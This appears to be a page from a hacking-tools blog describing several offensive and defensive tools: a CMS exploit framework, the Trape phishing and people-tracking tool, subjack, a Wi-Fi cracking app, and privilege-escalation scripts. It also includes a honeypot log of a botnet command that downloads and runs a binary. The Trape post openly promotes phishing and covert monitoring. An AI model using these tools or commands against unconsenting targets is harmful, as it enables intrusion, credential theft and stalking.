Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

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  • Pentest Distro Linux - Weakerth4n

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  • The Amnesic Incognito Live System - Tails

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  • Penetration Testing Distribution - BlackArch

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  • The Best Penetration Testing Distribution - Kali Linux

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  • Friendly OS designed for Pentesting - ParrotOS

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Sunday, January 7, 2018

A CMS Exploit Framework - cmsPoc

A CMS Exploit Framework.

  • python2.7
  • Works on Linux, Windows

usage: [-h]

optional arguments:
  -h, --help            show this help message and exit
  -t TYPE, --type TYPE  e.g.,phpcms
  -s SCRIPT, --script SCRIPT
                        Select script
  -u URL, --url URL     Input a target url

python -t phpcms -s v960_sqlinject_getpasswd -u

phpcms v960_sqlinject_getpasswd phpcmsv9.6.0 wap模块 sql注入 获取passwd
icms v701_sqlinject_getadmin icmsv7.0.1 admincp.php sql注入 后台任意登陆
discuz v34_delete_arbitary_files discuz ≤ v3.4 任意文件删除
beecms v40_fileupload_getshell beecms ≤ V4.0_R_20160525 文件上传漏洞


Mail Header Analyzer - MHA

Mail header analyzer is a tool written in flask for parsing email headers and converting them to a human readable format and it also can:
  • Identify hop delays.
  • Identify the source of the email.
  • Identify hop country.

MHA is an alternative for the following:
Name Dev Issues
MessageHeader Google Not showing all the hops.
EmailHeaders Mxtoolbox Not accurate and slow.
Message Header Analyzer Microsoft Broken UI.

Install system dependencies:
sudo apt-get update
sudo apt-get install python-pip
sudo pip install virtualenv
Create a Python virtual environment and activate it:
virtualenv virt
source virt/bin/activate
Clone the GitHub repo:
git clone
Install Python dependencies:
cd MHA
pip install -r requirements.txt
Run the development server:
python -d
You can change the bind address or port by specifying the appropriate options: python -b -p 8080
Everything should go well, now visit http://localhost:8080.

A Dockerfile is provided if you wish to build a docker image.
docker build -t mha:latest .
You can then run a container with:
docker run -d -p 8080:8080 mha:latest


People tracker on the Internet (The evolution of phishing attacks) OSINT - Trape

Trape is a recognition tool that allows you to track people, the information you can get is very detailed. We want to teach the world through this, as large Internet companies could monitor you, obtaining information beyond your IP.

Some benefits
  • One of its most enticing functions is the remote recognition of sessions. You can know where a person has logged in, remotely. This occurs through a Bypass made to the Same Origin Policy (SOP)
  • Currently you can try everything from a web interface. (The console, becomes a preview of the logs and actions)
  • Registration of victims, requests among other data are obtained in real time.
  • If you get more information from a person behind a computer, you can generate a more direct and sophisticated attack. Trape was used at some point to track down criminals and know their behavior.
  • You can do real time phishing attacks
  • Simple hooking attacks
  • Mapping
  • Important details of the objective
  • Capturing credentials
  • Open Source Intelligence (OSINT)

Recognizes the sessions of the following services
  • Facebook
  • Twitter
  • VK
  • Reddit
  • Gmail
  • tumblr
  • Instagram
  • Github
  • Bitbucket
  • Dropbox
  • Spotify
  • PayPal
  • Amazon

How to use it
First unload the tool.
git clone
cd trape
python -h
If it does not work, try to install all the libraries that are located in the file requirements.txt
pip install -r requirements.txt
Example of execution
Example: python --url --port 8080
  • In the option --url you must put the lure, can be a news page, an article something that serves as a presentation page.
  • In the --port option you just put the port where you want it to run
  • Do you like to monitor your people? Everything is possible with Trape
  • Do you want to perform phishing attacks? Everything is possible with Trape
  • In the Files directory, located on the path: /static/files here you add the files with .exe extension or download files sent to the victim.

Here are some simple videos to use:
At an international security event in Colombia, called DragonJAR Security Conference 2017, a demonstration was made before the launch. You can watch the video here:

This tool has been published educational purposes in order to teach people how bad guys could track them or monitor them or obtain information from their credentials, we are not responsible for the use or the scope that may have the People through this project.
We are totally convinced that if we teach how vulnerable things are, we can make the Internet a safer place.

Developers or participants
The following people are part of the core of development and research in Boxug.
This development and others, the participants will be mentioned with name, Twitter and charge.


Sunday, December 31, 2017

Python Telnet Honeypot For Catching Botnet Binaries - Telnet IoT Honeypot

This project implements a python telnet server trying to act as a honeypot for IoT Malware which spreads over horribly insecure default passwords on telnet servers on the internet.
Other than or (examples), which provides full (via chroot) or simulated behaviour of a linux system this honeypots goal is just to collect statistics of (IoT) botnets. This means that the honeypot must be made to work with every form of automated telnet session, which may try to infect the honeypot with malware. Luckily, these malwares infection processes are quite simple, just using wget do download something and running it.

The application has a client/server architekture, with a client (the actual honeypot) accepting telnet connections and a server aggregating connection data and sample analysis.
However, for local deployments, the application can also be run in local mode to eliminate the need to run a client and server locally.

The application has a config file named Samples are included for local and client/server deployments.

Client/Local Mode


Opening the frontend
After the server is started, open html/index.html in your favorite browser. For this to work, the url in html/apiurl.js should point to your running backend, which it should do automatically for local deployments.

Sample Connection
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget; chmod +x .i; ./.i; exit 



Hostile Subdomain Takeover tool written in Go - subjack

subjack is a Hostile Subdomain Takeover tool written in Go designed to scan a list of subdomains concurrently and identify ones that are able to be hijacked. With Go's speed and efficiency, this tool really stands out when it comes to mass-testing. Always double check the results manually to rule out false positives.

You need have Go installed. Full details of installation and set up can be found here.
go build subjack.go

How To Use:
./subjack -w domains.txt -t 100 -timeout 30 -o results.txt -https
  • -w domains.txt is your list of subdomains. I recommend using (included in repository) to sift through your subdomain list for ones that have CNAME records attached and use that list to optimize and speed up testing.
  • -t is the number of threads (Default: 10 threads).
  • -timeout is the seconds to wait before timeout connection (Default: 10 seconds).
  • -o results.txt where to save results to (Optional).
  • -https enforces https requests which may return a different set of results and increase accuracy (Optional).
Currently checks for:
  • Amazon S3 Bucket
  • Amazon Cloudfront
  • Cargo
  • Fastly
  • FeedPress
  • Ghost
  • Github
  • Helpjuice
  • Help Scout
  • Heroku
  • Shopify
  • Surge
  • Tumblr
  • UserVoice
  • WordPress
  • WP Engine

Practical Use
subjack included which is kind of a PoC script to mass-locate vulnerable subdomains using results from Rapid7's Project Sonar. This script parses and greps through the dump for desired CNAME records and makes a large list of subdomains to check with subjack if they're vulnerable to Hostile Subdomain Takeover. Of course this isn't the only method to get a large amount of data to test.


Monday, December 4, 2017

All-in-One Wi-Fi Cracking Tools for Android - Hijacker v1.4

Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.
This application requires an ARM android device with a wireless adapter that supports Monitor Mode. A few android devices do, but none of them natively. This means that you will need a custom firmware. Nexus 5 and any other device that uses the BCM4339 chipset (MSM8974, such as Xperia Z2, LG G2 etc) will work with Nexmon (it also supports some other chipsets). Devices that use BCM4330 can use bcmon. An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable.
The required tools are included for armv7l and aarch64 devices as of version 1.1. The Nexmon driver and management utility for BCM4339 are also included.
Root is also necessary, as these tools need root to work.


Information Gathering
  • View a list of access points and stations (clients) around you (even hidden ones)
  • View the activity of a specific network (by measuring beacons and data packets) and its clients
  • Statistics about access points and stations
  • See the manufacturer of a device (AP or station) from the OUI database
  • See the signal power of devices and filter the ones that are closer to you
  • Save captured packets in .cap file

  • Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target)
  • Deauthenticate a specific client from the network it's connected
  • MDK3 Beacon Flooding with custom options and SSID list
  • MDK3 Authentication DoS for a specific network or to everyone
  • Capture a WPA handshake or gather IVs to crack a WEP network
  • Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)

  • Leave the app running in the background, optionally with a notification
  • Copy commands or MAC addresses to clipboard
  • Includes the required tools, no need for manual installation
  • Includes the nexmon driver and management utility for BCM4339 devices
  • Set commands to enable and disable monitor mode automatically
  • Crack .cap files with a custom wordlist
  • Create custom actions and run them on an access point or a client easily
  • Sort and filter Access Points with many parameters
  • Export all the gathered information to a file
  • Add an alias to a device (by MAC) for easier identification


Make sure:
  • you are on Android 5+
  • you are rooted (SuperSU is required, if you are on CM/LineageOS install SuperSU)
  • have a firmware to support Monitor Mode on your wireless interface

Download the latest version here.
When you run Hijacker for the first time, you will be asked whether you want to install the nexmon firmware or go to home screen. If you have installed your firmware or use an external adapter, you can just go to the home screen. Otherwise, click 'Install Nexmon' and follow the instructions. Keep in mind that on some devices, changing files in /system might trigger an Android security feature and your system partition will be restored when you reboot. After installing the firmware you will land on the home screen and airodump will start. Make sure you have enabled your WiFi and it's in monitor mode.

This app is designed and tested for ARM devices. All the binaries included are compiled for that architecture and will not work on anything else. You can check by going to settings: if you have the option to install nexmon, then you are on the correct architecture, otherwise you will have to install all the tools manually (busybox, aircrack-ng suite, mdk3, reaver, wireless tools, library) and set the 'Prefix' option for the tools to preload the library they need.
In settings, there is an option to test the tools. If something fails, then you can click 'Copy test command' and select the tool that fails. This will copy a test command to your clipboard, which you can run in a terminal and see what's wrong. If all the tests pass and you still have a problem, feel free to open an issue here to fix it, or use the 'Send feedback' feature of the app in settings.
If the app happens to crash, a new activity will start which will generate a report in your external storage and give you the option to send it directly or by email. I suggest you do that, and if you are worried about what will be sent you can check it out yourself, it's just a txt file in your external storage directory. The part with the most important information is shown in the activity.
Please do not report bugs for devices that are not supported or when you are using an outdated version.
Keep in mind that Hijacker is just a GUI for these tools. The way it runs the tools is fairly simple, and if all the tests pass and you are in monitor mode, you should be getting the results you want. Also keep in mind that these are AUDITING tools. This means that they are used to TEST the integrity of your network, so there is a chance (and you should hope for it) that the attacks don't work on your network. It's not the app's fault, it's actually something to be happy about (given that this means that your network is safe). However, if an attack works when you type a command in a terminal, but not with the app, feel free to post here to resolve the issue. This app is still under development so bugs are to be expected.


It is highly illegal to use this application against networks for which you don't have permission. You can use it only on YOUR network or a network that you are authorized to. Using a software that uses a network adapter in promiscuous mode may be considered illegal even without actively using it against someone, and don't think for a second it's untracable. I am not responsible for how you use this application and any damages you may cause.

The app gives you the option to install the nexmon firmware on your device. Even though the app performs a chipset check, you have the option to override it, if you believe that your device has the BCM4339 wireless adapter. However, installing a custom firmware intended for BCM4339 on a different chipset can possibly damage your device (and I mean hardware, not something that is fixable with factory reset). I am not responsible for any damage caused to your device by this software.


Saturday, November 25, 2017

Tool To Analyse Packets, Decoding , Scanning Ports, And Geolocation - CyberScan

CyberScan is an open source penetration testing tool that can analyse packets , decoding , scanning ports, pinging and geolocation of an IP including (latitude, longitude , region , country ...)

Operating Systems Supported
  • Windows XP/7/8/8.1/10
  • GNU/Linux
  • MacOSX

You can download CyberScan by cloning the Git repository:
git clone
cd CyberScan/
python -v
CyberScan works out of the box with Python version 2.6.x and 2.7.x.


Thursday, November 16, 2017

Bash Script Purposed For System Enumeration, Vulnerability Identification And Privilege Escalation - MIDA-Multitool

Bash script purposed for system enumeration, vulnerability identification and privilege escalation.
MIDA Multitool draws functionality from several of my previous scripts namely SysEnum and RootHelper and is in many regards RootHelpers successor.
Besides functionality from these two previous scripts it incorporates some of it's own and as such aims to be a comprehensive assistant for operations and utilities related to system enumeration, vulnerability identification, exploitation and privilege escalation.

After a system has been succesfully compromised MIDA should be downloaded to the host in question either with git or wget, after it has been unpacked/cloned the shellscript needs to be made executable with chmod +x
Upon doing so it can be run on the target host. The options available to the user are below.
The 'Usage' option prints this informational message. The option 'System Enumeration' attempts to retrieve system information such as OS and kernel details, network status, processes, system logs and more. 'Common Utilities' checks for the existence of useful utilities such as telnet, netcat, tcpdump etc. 'External Utilities' opens a menu which lets you download external utilities that may prove to be helpful with further enumeration, vulnerability identification and privilege escalation.
Finally the option 'Cleartext Credentials' searches for text and web application files that contain certain keywords in order to find potential cleartext passwords.

Scripts available for download with MIDA


Saturday, October 28, 2017

Scripted Local Linux Enumeration and Privilege Escalation Checks - LinEnum v0.6

LinEnum will automate many of the checks that I’ve documented in the Local Linux Enumeration & Privilege Escalation Cheatsheet. It’s a very basic shell script that performs over 65 checks, getting anything from kernel information to locating possible escalation points such as potentially useful SUID/GUID files and Sudo/rhost mis-configurations and more.

General usage:
version 0.6
  • Example: ./ -k keyword -r report -e /tmp/ -t

  • -k Enter keyword
  • -e Enter export location
  • -t Include thorough (lengthy) tests
  • -r Enter report name
  • -h Displays this help text
Running with no options = limited scans/no output file
  • -e Requires the user enters an output location i.e. /tmp/export. If this location does not exist, it will be created.
  • -r Requires the user to enter a report name. The report (.txt file) will be saved to the current working directory.
  • -t Performs thorough (slow) tests. Without this switch default 'quick' scans are performed.
  • -k An optional switch for which the user can search for a single keyword within many files (documented below).

High-level summary of the checks/tasks performed by LinEnum:
  • Kernel and distribution release details
  • System Information:
    • Hostname
    • Networking details:
    • Current IP
    • Default route details
    • DNS server information
  • User Information:
    • Current user details
    • Last logged on users
    • Shows users logged onto the host
    • List all users including uid/gid information
    • List root accounts
    • Extracts password policies and hash storage method information
    • Checks umask value
    • Checks if password hashes are stored in /etc/passwd
    • Extract full details for ‘default’ uid’s such as 0, 1000, 1001 etc
    • Attempt to read restricted files i.e. /etc/shadow
    • List current users history files (i.e .bash_history, .nano_history etc.)
    • Basic SSH checks
  • Privileged access:
    • Determine if /etc/sudoers is accessible
    • Determine if the current user has Sudo access without a password
    • Are known ‘good’ breakout binaries available via Sudo (i.e. nmap, vim etc.)
    • Is root’s home directory accessible
    • List permissions for /home/
  • Environmental:
    • Display current $PATH
    • Displays env information
  • Jobs/Tasks:
    • List all cron jobs
    • Locate all world-writable cron jobs
    • Locate cron jobs owned by other users of the system
  • Services:
    • List network connections (TCP & UDP)
    • List running processes
    • Lookup and list process binaries and associated permissions
    • List inetd.conf/xined.conf contents and associated binary file permissions
    • List init.d binary permissions
  • Version Information (of the following):
    • Sudo
    • MYSQL
    • Postgres
    • Apache
      • Checks user config
      • Shows enabled modules
  • Default/Weak Credentials:
    • Checks for default/weak Postgres accounts
    • Checks for default/weak MYSQL accounts
  • Searches:
    • Locate all SUID/GUID files
    • Locate all world-writable SUID/GUID files
    • Locate all SUID/GUID files owned by root
    • Locate ‘interesting’ SUID/GUID files (i.e. nmap, vim etc)
    • List all world-writable files
    • Find/list all accessible *.plan files and display contents
    • Find/list all accessible *.rhosts files and display contents
    • Show NFS server details
    • Locate *.conf and *.log files containing keyword supplied at script runtime
    • List all *.conf files located in /etc
    • Locate mail
  • Platform/software specific tests:
    • Checks to determine if we're in a Docker container
    • Checks to see if the host has Docker installed


Tool to Detect Sandboxes and Analysis Environments in the Same Way as Malware Families Do - Pafish

Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do.
The project is open source, you can read the code of all anti-analysis checks.

The objective of this project is to collect usual tricks seen in malware samples. This allows us to study them, and test if our analysis environments are properly implemented.

Pafish is written in C and can be built with MinGW (gcc + make).
Check out "How to build" for detailed instructions.

Alberto Ortega (@a0rtega - profile)

You can also download the executable of the latest stable version.

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